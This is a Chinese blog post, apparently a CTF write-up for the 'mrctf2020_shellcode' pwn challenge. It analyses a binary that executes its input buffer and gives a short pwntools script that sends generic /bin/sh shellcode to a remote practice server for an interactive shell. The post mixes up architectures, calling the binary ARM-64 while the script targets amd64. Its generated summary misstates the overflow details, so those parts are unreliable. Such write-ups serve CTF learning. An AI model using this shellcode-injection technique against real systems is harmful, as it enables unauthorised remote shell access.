mrctf2020_shellcode

hercu1iz

于 2023-04-19 19:35:03 发布

阅读量306

点赞数 1

分类专栏： PWN 文章标签： pwn

cctrl

本文链接：https://blog.youkuaiyun.com/weixin_44309300/article/details/130250956

版权

PWN 专栏收录该内容

41 篇文章

订阅专栏

文章介绍了在ARM-64环境下，一个程序使用了FullRELRO但未能防止溢出攻击的情况。通过IDA分析，发现程序读取400字节到缓冲区，且之后比较返回值并可能执行shellcode。由于FullRELRO无效，可以直接构造shellcode注入。作者使用Pwntools的Python库生成shellcode，并远程或本地执行payload来触发shell。

摘要生成于 C知道，由 DeepSeek-R1 满血版支持，前往体验 >

1，三连

1、arm-64-el
2、RELRO:    Full RELRO

2，IDA分析
在这里插入图片描述
无法反编译，直接看汇编：

1、没有发生溢出，缓存区410h，只输入了400h
2、read()完，返回值与0比较，进行跳转short loc_11D6
3、short loc_11D6执行输入buf中的内容，即可构造shellcode

RELRO: Full RELRO完全没起作用，直接构造shellcode输入即可。

3，payload

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

shellcode = asm(shellcraft.sh())

r = remote('node4.buuoj.cn',26790)
#r = process('./mrctf2020_shellcode')

r.send(shellcode)
r.interactive()

在这里插入图片描述